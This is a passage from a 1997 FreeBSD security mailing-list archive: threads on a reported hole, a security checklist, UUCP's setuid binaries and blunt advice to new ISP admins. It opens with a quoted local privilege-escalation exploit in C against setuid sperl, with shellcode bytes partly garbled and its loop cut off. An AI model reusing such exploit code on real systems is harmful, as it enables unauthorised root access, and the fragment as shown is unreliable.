transcript of his brief moment of fame on this discussion list. /* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl exploit by Ovx */ #include #include #include #define BUFFER_SIZE 1400 #define OFFSET 600 char *get_esp(void) { asm("movl %esp,%eax"); } char buf[BUFFER_SIZE]; main(int argc, char *argv[]) { int i; char execshell[] = "\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; for(i=0+1;i Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA25403 for security-outgoing; Wed, 30 Jul 1997 12:05:00 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA25393 for ; Wed, 30 Jul 1997 12:04:54 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id PAA21876; Wed, 30 Jul 1997 15:00:01 -0400 (EDT) From: Adam Shostack Message-Id: <199707301900.PAA21876@homeport.org> Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <199707301450.JAA25877@shift-f1.com> from Shashi Joshi at "Jul 30, 97 09:50:56 am" To: shashi@shift-f1.com (Shashi Joshi) Date: Wed, 30 Jul 1997 15:00:01 -0400 (EDT) Cc: molter@logic.it, vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Guy Helmer is working on a paper on exactly this topic. Perhaps he could post a pointer to his current draft? Adam | Exactly my thoughts. So, do we get a checklist or reference list from the | gurus? | | I am also a bit new to the sys admin duties. I have | taken the time to read the FreeBSD book that came with the CD (which | doesn't help much in the security area), read a UNIX sysadmin book (Nemeth, | Snyder etc the Red Book) but it too has its limitations. | | We don't have external user logins, so the risks are much less, but I would | always like to learn because soon we will be "out there". | | Another netter mentioned about FreeBSD should ship with some documentation, | scripts that tell us (about the system files and directories) what are the | files associated with "feature" A or "service" B (e.g. uucp), which files | need to be setuid for what functionality. | | Here is an example. (I know you gurus will laugh, but it was my 3rd day only). | | Realizing that sbin dirs are for sysadmin related files, I made the */sbin | as -r-xr-x--- and group being wheel or bin as appropriate. | Now, after a few weeks!! I realised that I am not able to send out any | mail. I had been receiving mail like anything, my elm session also didn't | complain when I sent out email. Finally I checked the logs and found | nothing, not a trace of a mail sent out. So I checked to see `which | sendmail` and it was /usr/sbin/sendmail | So I had to give r-x permissions to it to the world. | | Now why would sendmail be in sbin when it is not purely a sysadmin tool | only? | | My point? Having a document or a checklist would be real helpful to newbies | and can serve as a quick reference for the gurus. | | regards, | | -- | Shashi Joshi | -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Wed Jul 30 14:01:05 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA03267 for security-outgoing; Wed, 30 Jul 1997 14:01:05 -0700 (PDT) Received: from tok.qiv.com ([204.214.141.211]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA03259 for ; Wed, 30 Jul 1997 14:01:02 -0700 (PDT) Received: (from uucp@localhost) by tok.qiv.com (8.8.6/8.8.5) with UUCP id QAA01312; Wed, 30 Jul 1997 16:00:43 -0500 (CDT) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.6/8.8.5) with SMTP id PAA01063; Wed, 30 Jul 1997 15:52:39 -0500 (CDT) X-Authentication-Warning: acp.qiv.com: jdn owned process doing -bs Date: Wed, 30 Jul 1997 15:52:38 -0500 (CDT) From: "Jay D. Nelson" To: James Seng cc: security@FreeBSD.ORG Subject: Keep UUCP (Was: Re: security hole in FreeBSD) In-Reply-To: <3.0.32.19970730223202.0070ef8c@student.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Sometimes I think we can be too "internet-centric" for our own good. UUCP makes good security and economic sense. An ISP that caters to internet aficionados will have no use for UUCP. But commercial customers are showing interest because a) UUCP isolates them from the internet, providing greater security while keeping employees from `surfing', b) costs far less than the typical dedicated connection. PSInet charges $50/Mo. + $145.00 setup, I believe, and c) many of our foreign friends have no other reasonable way go. >From the ISP's perspective, a UUCP account ties up far less resources than the dedicated or ppp account. As an example, last month I transfered 12.14 Megs with a total connect time of 1.66 hours (28.8). If I had an out-of-state long distance peer, I would have spent less than $14.00 in long distance charges. In other words, my commercial client could have one UUCP connection to a provider and serve mail to seven out-of-state offices for less than the typical dedicated 64K ISDN account. So that is my case. I understand the desire to reduce distribution size and eliminate unused suid binaries -- but to take UUCP out seems to me equivalent to getting rid of the C compiler and development tools. Make it an install option if you want, but leave it as a part of the standard distribution. -- Jay On Wed, 30 Jul 1997, James Seng wrote: ->At 09:06 PM 7/29/97 -0400, Adam Shostack wrote: ->> Let me be clear; I don't have anything against UUCP users, but ->>most people don't need it turned on. Since its parts of it are ->>setuid, (and thus potential security holes) I think its a reasonable ->>to suggest that it ship either not setuid or as an install option. -> ->I have not heard of any request for the use UUCP from my users nor is my ->UUCP binaries been used in the last few years...I think the time when lease ->line is expensive, when university work with 9,600bps (wow) connection and ->when UUCP rules the earth is over...we have to let it go and look forward. *8) -> ->I have nothing against UUCP of cos but it is always nice if we can reduce ->the base distribution size by letting some of the less often used stuff away. -> ->*cheers* -> ->-James Seng -> From owner-freebsd-security Wed Jul 30 14:04:28 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA03459 for security-outgoing; Wed, 30 Jul 1997 14:04:28 -0700 (PDT) Received: from usr01.primenet.com (root@usr01.primenet.com [206.165.6.201]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA03449 for ; Wed, 30 Jul 1997 14:04:22 -0700 (PDT) Received: from frontera (mario1@ip62-219.vcv.primenet.com [207.218.62.219]) by usr01.primenet.com (8.8.5/8.8.5) with SMTP id OAA15012; Wed, 30 Jul 1997 14:03:01 -0700 (MST) Date: Wed, 30 Jul 1997 14:07:13 -0700 (Pacific Daylight Time) From: "[Mario1-]" To: Vincent Poy cc: Nate Williams , Marco Molteni , security@freebsd.org Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: X-X-Sender: Mario1@imap.primenet.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Vincent Poy wrote: : I'll try but with this security incident, it's different because : all three of us went into panic since if we had access to the machine now, : we would be able to atleast find things. I guess what I need to do is : find the time to start reading things but I don't know where to start : since things in the computer area become obselete so fast these days : anyways. : Vince, to get quick answers, fire up your web browser and do a search. You'd be surprised at the amount of information out there, and no upfront cost for books is involved. Regards, -- Mario1@PrimeNet.Com http://www.primenet.com/~mario1 Eskimo Democracy: "If you continue to subscribe to this list only to publically oppose any descision nanook or I make, I'm going to disallow you post permission to this list." dwild@eskimo.com From owner-freebsd-security Wed Jul 30 14:24:48 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA04523 for security-outgoing; Wed, 30 Jul 1997 14:24:48 -0700 (PDT) Received: from cs.iastate.edu (cs.iastate.edu [129.186.3.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA04416 for ; Wed, 30 Jul 1997 14:23:31 -0700 (PDT) Received: from popeye.cs.iastate.edu (popeye.cs.iastate.edu [129.186.3.4]) by cs.iastate.edu (8.8.5/8.7.1) with ESMTP id QAA10709; Wed, 30 Jul 1997 16:22:54 -0500 (CDT) Received: from localhost (ghelmer@localhost) by popeye.cs.iastate.edu (8.8.5/8.7.1) with SMTP id QAA22586; Wed, 30 Jul 1997 16:22:54 -0500 (CDT) X-Authentication-Warning: popeye.cs.iastate.edu: ghelmer owned process doing -bs Date: Wed, 30 Jul 1997 16:22:53 -0500 (CDT) From: Guy Helmer To: Adam Shostack cc: Shashi Joshi , molter@logic.it, vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <199707301900.PAA21876@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Adam Shostack wrote: > Guy Helmer is working on a paper on exactly this topic. Perhaps he > could post a pointer to his current draft? > Adam > > | Exactly my thoughts. So, do we get a checklist or reference list from the > | gurus? A slightly older draft of the paper is at http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps but it should serve well enough for now for those in need of at least pointers to the broad spectrum of FreeBSD security improvements. A current version of the paper isn't ready for posting... Guy Helmer, Computer Science Graduate Student - ghelmer@cs.iastate.edu Iowa State University http://www.cs.iastate.edu/~ghelmer From owner-freebsd-security Wed Jul 30 15:26:06 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA08744 for security-outgoing; Wed, 30 Jul 1997 15:26:06 -0700 (PDT) Received: from Kryten.nina.org (port-32.ts2.gnv.fdt.net [205.229.51.160]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA08732 for ; Wed, 30 Jul 1997 15:26:01 -0700 (PDT) Received: from localhost (frankd@localhost) by Kryten.nina.org (8.8.5/8.8.5) with SMTP id SAA23464; Wed, 30 Jul 1997 18:11:39 -0400 (EDT) X-Authentication-Warning: Kryten.nina.org: frankd owned process doing -bs Date: Wed, 30 Jul 1997 18:11:39 -0400 (EDT) From: Frank Seltzer X-Sender: frankd@Kryten.nina.org To: Guy Helmer cc: Adam Shostack , Shashi Joshi , molter@logic.it, vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Guy Helmer wrote: > A slightly older draft of the paper is at > > http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps > > but it should serve well enough for now for those in need of at least > pointers to the broad spectrum of FreeBSD security improvements. A > current version of the paper isn't ready for posting... > > Guy Helmer, Computer Science Graduate Student - ghelmer@cs.iastate.edu > Iowa State University http://www.cs.iastate.edu/~ghelmer > > I get a 404 when trying to 'fetch' this. Frank -- Only in America can a homeless veteran sleep in a cardboard box while a draft dodger sleeps in the White House - anonymous From owner-freebsd-security Wed Jul 30 15:51:11 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA10136 for security-outgoing; Wed, 30 Jul 1997 15:51:11 -0700 (PDT) Received: from kalypso.iqm.unicamp.br (kalypso.iqm.unicamp.br [143.106.51.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA10129 for ; Wed, 30 Jul 1997 15:51:06 -0700 (PDT) Received: (from vazquez@localhost) by kalypso.iqm.unicamp.br (8.8.6/8.7.3/FreeBSD/2.1.5) id TAA17929; Wed, 30 Jul 1997 19:54:27 -0300 (EST) From: Pedro A M Vazquez Message-Id: <199707302254.TAA17929@kalypso.iqm.unicamp.br> Subject: Re: So, lets have a checklist compiled (was Re: Security hole) To: frankd@yoda.fdt.net (Frank Seltzer) Date: Wed, 30 Jul 1997 19:54:27 -0300 (EST) Cc: security@freebsd.org In-Reply-To: from "Frank Seltzer" at Jul 30, 97 06:11:39 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Me too, just add a .gz : http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps.gz Frank Seltzer was saying that: > > > A slightly older draft of the paper is at > > > > http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps > > I get a 404 when trying to 'fetch' this. > Pedro From owner-freebsd-security Wed Jul 30 15:53:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA10388 for security-outgoing; Wed, 30 Jul 1997 15:53:53 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA10379 for ; Wed, 30 Jul 1997 15:53:50 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id PAA14882; Wed, 30 Jul 1997 15:53:24 -0700 (PDT) To: Marco Molteni cc: Vincent Poy , security@FreeBSD.ORG, "\[Mario1-\]" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 14:04:33 +0200." Date: Wed, 30 Jul 1997 15:53:24 -0700 Message-ID: <14878.870303204@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Do you think one can be a newcomer as an administrator, but _has_ to know > everything about security before he starts to work? Come on! Actually, if this question is: "Can a newcomer to UNIX be an administrator" then the answer is a most emphatic "NO." I don't let the mechanically inept work on my car, either, and I wouldn't expect a 1st-year UNIX hacker to sell himself as an admin (or if [s]he did, I certainly bloody wouldn't hire them and would probably further denounce as a fool anyone who did). This flame doesn't also actually have a lot to do with Vince directly, though I do think that he's perhaps a little too inexperienced for the job he's taken on, but is rather more of a commentary on a highly disturbing phenomenon which I've observed in far too many ISPs lately. It seems like becoming an ISP has been the "in" thing to do these last few years, and many have jumped in with far more enthusiasm than skill. I probably get between 2 and 3 calls a week from some ISP who's completely hosed themselves and, as it turns out, knows NOTHING about UNIX or any of the infrastructure issues behind building an ISP and yet they're trying to do it anyway. What's the deal here? Did somebody drop a million matchbooks over the U.S. saying "become an ISP and make tons of $$$ in your spare time! No knowledge whatsoever is required! Yes, even the legally dead can enter the profitable world of ..." :-) Jordan From owner-freebsd-security Wed Jul 30 16:04:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11011 for security-outgoing; Wed, 30 Jul 1997 16:04:55 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11004 for ; Wed, 30 Jul 1997 16:04:52 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id QAA14961; Wed, 30 Jul 1997 16:04:24 -0700 (PDT) To: Vincent Poy cc: Marco Molteni , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 06:45:49 PDT." Date: Wed, 30 Jul 1997 16:04:24 -0700 Message-ID: <14957.870303864@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > what Jordan told me back in the FreeBSD 1.0 Gamma days. One will never > know everything and will need to learn from others. Unless everyone is > Albert Einstein here. It's not what you know, it's how you learn. Be more willing to investigate the obvious before you run to the mailing lists for help and you'll go much further here, Vince. Lack of proper "invesigative skills" is your biggest weakness, as I've amply seen while observing you these last couple of years, and you won't hone this skill by asking questions, you'll hone it by spending just a little extra time on each problem before bringing up that email client. Jordan From owner-freebsd-security Wed Jul 30 16:07:58 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11123 for security-outgoing; Wed, 30 Jul 1997 16:07:58 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11116 for ; Wed, 30 Jul 1997 16:07:55 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id QAA14985; Wed, 30 Jul 1997 16:07:02 -0700 (PDT) To: Shashi Joshi cc: molter@logic.it (Marco Molteni), vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-reply-to: Your message of "Wed, 30 Jul 1997 09:50:56 CDT." <199707301450.JAA25877@shift-f1.com> Date: Wed, 30 Jul 1997 16:07:02 -0700 Message-ID: <14982.870304022@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Exactly my thoughts. So, do we get a checklist or reference list from the > gurus? I seriously doubt it. None of the gurus have this kind of time. > My point? Having a document or a checklist would be real helpful to newbies > and can serve as a quick reference for the gurus. The body of available UNIX documentation out there, much of which is listed in the glossary of the FreeBSD handbook, is about as good as it gets and it isn't all that bad - even as complete a "checklist" as I could imagine would end up being largely replicating the docs which these books currently provide. Jordan From owner-freebsd-security Wed Jul 30 16:26:32 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA12269 for security-outgoing; Wed, 30 Jul 1997 16:26:32 -0700 (PDT) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA12247 for ; Wed, 30 Jul 1997 16:26:26 -0700 (PDT) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id QAA15075; Wed, 30 Jul 1997 16:24:58 -0700 (PDT) To: Vincent Poy cc: Nate Williams , Marco Molteni , security@FreeBSD.ORG, "[Mario1-]" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 08:28:47 PDT." Date: Wed, 30 Jul 1997 16:24:58 -0700 Message-ID: <15071.870305098@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > The docs that came with the product. As for books, I don't have > that much time to go through reading books because by the time I finish > reading it, it'll be too late. Heh. Vinnie, that is the most completely and utterly bogus argument I've ever heard. I have the Stevens book on Networking right here, for example, and it's as relevant today as it was the day it was published (and a great book on network programming besides). The same goes for the 4.4 BSD book from McKusick et al. If you want to know about the kernel, it's a fine place to start. Or how about Evi Nemeth'd book on system admin? Even the old editions are still largely relevant, and I'd recommend the book to anyone. This sounds like a pathetic excuse for avoiding your necessary reading and nothing else but. Give it up - now you're just trying to cram the other foot in where the first is already taking up all the space. :-) > You're still forgetting the fact that when you are physically > there next to the router machine, it's a night and day difference in > figuring things out. But when it's like totally remote, then you do need > to verify things first instead of totally screwing it up. Besides, for You first run simulations on your own machine, Vince. If you haven't got a machine for doing this kind of thing then I suggest that you de-volunteer for this position you've taken on because you are NOT QUALIFIED to admin a system under these constraints. Believe it or not, admin'ing for an ISP is is not a kiddy game. Anyway, I think you simply need to listen more, argue less and be willing to do more basic research before reaching for the red phone in the future if you want to be a success at this and not have everybody hating the very sight of your email address to boot. When my martial arts teacher tells me that I'm not standing straight enough or that I'm too tense and am blowing some form I'm doing, I don't sass back and claim that Sifu doesn't know what he's talking about - of course he knows all that waaaaay better than I do and that's why I'm going to his bloody class. Similarly, people like Nate and I know this stuff a hell of a lot better than you do and when we say "Vince, you're fucking up - go read this book" then you should go read it, you shouldn't fire off another diatribe in response about how you don't have time or that the space aliens from the planet Zoobula who live in your sock drawer will be displeased. If you really do see yourself as such a beginner then LISTEN to those who know and stop being so bleeding contentious about everything. When we tell you to do something it's for a reason and we expect you to either do it or simply stop asking questions since you've obviously reached expert status on your own and no longer need our advice. Jordan From owner-freebsd-security Wed Jul 30 16:26:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA12277 for security-outgoing; Wed, 30 Jul 1997 16:26:35 -0700 (PDT) Received: from yoss.canweb.net (root@yoss.canweb.net [207.139.235.8]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA12252 for ; Wed, 30 Jul 1997 16:26:27 -0700 (PDT) Received: from localhost (yossman@localhost) by yoss.canweb.net (8.8.5/8.8.5) with SMTP id TAA01717; Wed, 30 Jul 1997 19:20:40 -0400 (EDT) Date: Wed, 30 Jul 1997 19:20:40 -0400 (EDT) From: yossman To: John Preisler cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707290231.VAA03478@argon.vapornet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk i've just been looking and i haven't found any either. just to be cute i linked ~root/.rhosts to /dev/null. ;) yossman On Mon, 28 Jul 1997, John Preisler wrote: > > > I'm not convinced that FreeBSD installs a /root/.rhosts by default. > None of my boxes have it. > > -jrp > ------------------------------------------------------------------------ Yossarian Holmberg (yossman) yossman@canweb.net System Administrator, National Online http://www.canweb.net/~yossman/ my statements are my own, not my employer's -- i do not speak for them. '... and if i die, before i learn to speak .. can money pay for all the days i've lived awake but half asleep?' -- Primitive Radio Gods, "Standing Outside a Broken Phone Booth With Money In My Hand" From owner-freebsd-security Wed Jul 30 17:16:26 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA15224 for security-outgoing; Wed, 30 Jul 1997 17:16:26 -0700 (PDT) Received: from fly.HiWAAY.net (root@fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA15100 for ; Wed, 30 Jul 1997 17:15:32 -0700 (PDT) Received: from nexgen.hiwaay.net by fly.HiWAAY.net; (8.8.6/1.1.8.2/21Sep95-1003PM) id SAA15166; Wed, 30 Jul 1997 18:44:58 -0500 (CDT) Received: from nexgen (localhost [127.0.0.1]) by nexgen.hiwaay.net (8.8.6/8.8.4) with ESMTP id SAA13216 for ; Wed, 30 Jul 1997 18:02:08 -0500 (CDT) Message-Id: <199707302302.SAA13216@nexgen.hiwaay.net> X-Mailer: exmh version 2.0zeta 7/24/97 To: freebsd-security@FreeBSD.ORG From: dkelly@HiWAAY.net Subject: Re: Commercial ssh and ssl (was Re: securelevel...) In-reply-to: Message from Robert Watson of "Wed, 30 Jul 1997 10:06:57 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 30 Jul 1997 18:02:08 -0500 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Robert Watson replied: > > On Tue, 29 Jul 1997 dkelly@hiwaay.net wrote: > > > I forgot, when does the relavent RSA patent expire? Maybe we can wait until > > then. :-) > > September, 2000. I wouldn't wait on this one. :) Oh, I don't know. The way some things are going (not going), 3 more years may be just about right. :-( -- David Kelly N4HHE, dkelly@hiwaay.net ===================================================================== The human mind ordinarily operates at only ten percent of its capacity -- the rest is overhead for the operating system. From owner-freebsd-security Wed Jul 30 20:02:13 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA26207 for security-outgoing; Wed, 30 Jul 1997 20:02:13 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA26177 for ; Wed, 30 Jul 1997 20:02:03 -0700 (PDT) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.5/8.7.3) id MAA25307; Thu, 31 Jul 1997 12:31:46 +0930 (CST) From: Michael Smith Message-Id: <199707310301.MAA25307@genesis.atrad.adelaide.edu.au> Subject: Re: security hole in FreeBSD In-Reply-To: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca> from Patrick Gilbert at "Jul 30, 97 02:44:02 pm" To: gilbertp@videotron.com (Patrick Gilbert) Date: Thu, 31 Jul 1997 12:31:46 +0930 (CST) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Patrick Gilbert stands accused of saying: > > After a brief discussion with TheCa on Efnet, he dcc'd me his famous > exploit for a transcript of > his brief moment of fame on this discussion list. Oh, what a d00d. > execl("/usr/bin/sperl5.00403", > "/usr/bin/sperl5.00403", buf, NULL); > } This looks like a Linux exploit; there is no Perl5 in the FreeBSD tree, and if it were installed from the port/package it would be in /usr/local/bin. -- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Wed Jul 30 21:12:11 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA00431 for security-outgoing; Wed, 30 Jul 1997 21:12:11 -0700 (PDT) Received: from cwsys.cwent.com (66@cschuber.net.gov.bc.ca [142.31.240.113]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA00393 for ; Wed, 30 Jul 1997 21:12:04 -0700 (PDT) Received: (from uucp@localhost) by cwsys.cwent.com (8.8.6/8.6.10) id VAA02443; Wed, 30 Jul 1997 21:10:52 -0700 (PDT) Message-Id: <199707310410.VAA02443@cwsys.cwent.com> Received: from localhost.cwent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwent.com, id smtpd002438; Thu Jul 31 04:10:46 1997 X-Mailer: exmh version 2.0gamma 1/27/96 Reply-to: cschuber@uumail.gov.bc.ca To: Vincent Poy cc: "Jordan K. Hubbard" , Marco Molteni , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 16:04:24 PDT." <14957.870303864@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 30 Jul 1997 21:10:46 -0700 From: Cy Schubert Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > know everything and will need to learn from others. Unless everyone is > > Albert Einstein here. > > It's not what you know, it's how you learn. Be more willing to > investigate the obvious before you run to the mailing lists for help > and you'll go much further here, Vince. Lack of proper "invesigative > skills" is your biggest weakness, as I've amply seen while observing > you these last couple of years, and you won't hone this skill by > asking questions, you'll hone it by spending just a little extra time > on each problem before bringing up that email client. > > Jordan > Jordan makes a lot of sense here. About 25 years ago a Computing Science teacher of mine told me that people either get it or they don't. In her experience, all class marks could be plotted on an inverted bell curve: Many people would get 80-100% and many would get 0-30% while hardly anyone would get 31-79%. She didn't go on to explain why this was so, however Jordan's remarks are probably one of the reasons. During the years since hearing that remark, I've had to agree with that teacher (and Jordan) many times and this is one of those times. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 UNIX Support OV/VM: BCSC02(CSCHUBER) ITSD BITNET: CSCHUBER@BCSC02.BITNET Government of BC Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Wed Jul 30 22:03:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA03410 for security-outgoing; Wed, 30 Jul 1997 22:03:53 -0700 (PDT) Received: from cs.iastate.edu (cs.iastate.edu [129.186.3.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA03400 for ; Wed, 30 Jul 1997 22:03:37 -0700 (PDT) Received: from popeye.cs.iastate.edu (popeye.cs.iastate.edu [129.186.3.4]) by cs.iastate.edu (8.8.5/8.7.1) with ESMTP id UAA14376; Wed, 30 Jul 1997 20:54:59 -0500 (CDT) Received: from localhost (ghelmer@localhost) by popeye.cs.iastate.edu (8.8.5/8.7.1) with SMTP id UAA05785; Wed, 30 Jul 1997 20:54:59 -0500 (CDT) X-Authentication-Warning: popeye.cs.iastate.edu: ghelmer owned process doing -bs Date: Wed, 30 Jul 1997 20:54:58 -0500 (CDT) From: Guy Helmer To: Frank Seltzer cc: Adam Shostack , Shashi Joshi , molter@logic.it, vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Frank Seltzer wrote: > On Wed, 30 Jul 1997, Guy Helmer wrote: > > > A slightly older draft of the paper is at > > > > http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps > > I get a 404 when trying to 'fetch' this. Apologies -- I forgot it was gzipped: http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps.gz Guy Helmer, Computer Science Graduate Student - ghelmer@cs.iastate.edu Iowa State University http://www.cs.iastate.edu/~ghelmer From owner-freebsd-security Wed Jul 30 22:50:59 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA05762 for security-outgoing; Wed, 30 Jul 1997 